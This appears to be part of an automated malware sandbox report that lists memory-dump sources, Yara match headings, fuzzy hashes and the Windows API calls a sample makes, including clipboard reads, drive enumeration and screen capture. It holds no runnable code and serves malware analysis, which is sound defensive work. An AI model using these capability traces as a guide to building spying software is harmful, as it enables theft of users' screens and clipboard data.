• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
• Instruction ID: a611846b0fa20e9d8ad4a3b201c71c1ff61f7edb375d67ac721352836e98058b
• Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
• Instruction Fuzzy Hash: 6EC04C69A6C4008A924CCB55AC9053172769B8B254B15E029802A53255E2649457C94D
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
• Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
• Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
• Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
• Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
• Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
• Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
• Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
• Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
• Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID: @$B$C$E$F$K$N$O$t${$}
• API String ID: 2832541153-984153585
• Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
• Instruction ID: 77dcc37273657a30de4e737d48430d486c59e309712728f86e8c66bed2498cbb
• Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
• Instruction Fuzzy Hash: 25415C7050C3818ED311EF78948835FBFE5AB92318F05096DE4D987296D7B9C548CBAB
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID: DrivesLogical
• String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
• API String ID: 999431828-351939610
• Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
• Instruction ID: 98815a668fff7cd6cd6910722281def0a154962e2b2d34272f4a8a4bcd47f89b
• Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
• Instruction Fuzzy Hash: B631FCB41493548FC314CF15C89122BBBB2FFC1324F40981CF6964B720E779994ACB42
APIs
• GetDC.USER32(00000000), ref: 02136BF0
• GetCurrentObject.GDI32(00000000,00000007), ref: 02136C11
• GetObjectW.GDI32(00000000,00000018,?), ref: 02136C21
• DeleteObject.GDI32(00000000), ref: 02136C28
• CreateCompatibleDC.GDI32(00000000), ref: 02136C37
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02136C42
• SelectObject.GDI32(00000000,00000000), ref: 02136C4E
• BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02136C71
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
• String ID:
• API String ID: 2843486406-0
• Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
• Instruction ID: 88dc72446b61d773bae4b1778e9fe447bce96a13afddce8d0a62a169f9209d73
• Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6214FB9544310EFE3509F609C49B2B7BF9EB8AB11F014929FA59A2290D77498048B67
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 02125411
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                        • String ID: +$e$+$e$XY$E#G
                                                                                                                                                                                                                                        • API String ID: 237503144-1023387988
                                                                                                                                                                                                                                        • Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                                        • Instruction ID: 889aa99dfa24cbfc1346f60c0a782832a5c5f50b7e18343fc2dcb72d1edded62
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC21363024C344AFE3148F65E88171FBBE0EBC6714F24C82CE5A85B282D775C80A8F86
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 02125B5B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                        • String ID: B"@$`J/H$rp
                                                                                                                                                                                                                                        • API String ID: 237503144-3817236508
                                                                                                                                                                                                                                        • Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                                        • Instruction ID: e554684047942922bbb0540b9233d797576653ad7eae3a1ed7d03634a553576d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC31CDB0E443589FDB14CFA9D8827DEBBB2EF45700F50002CE441BB295D6B55906CFA9
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: aN@$Mw
                                                                                                                                                                                                                                        • API String ID: 3664257935-3418203734
                                                                                                                                                                                                                                        • Opcode ID: 28d46f0181f3b50e948c632c08c35fa26ca83e1b98030933ba528579462b072f
                                                                                                                                                                                                                                        • Instruction ID: fb7b49653fcfe6187a11668ca7033b53e8d7d933bb39412ee55706a61e0bd157
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28d46f0181f3b50e948c632c08c35fa26ca83e1b98030933ba528579462b072f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5951777460C3C08BE3358B299C557ABBFE29FE2308F48096DE0D95B3D2DA74440AC75A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: Mw
                                                                                                                                                                                                                                        • API String ID: 3664257935-2910736759
                                                                                                                                                                                                                                        • Opcode ID: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
                                                                                                                                                                                                                                        • Instruction ID: 76f8199259777ce60f51c6d99c718f1815bb22ab62b72bec75753df54c08d8dc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2C0023B8620009BDE857FA0FD898187A31FB4A30531C44B4B80140036DAA20960AA59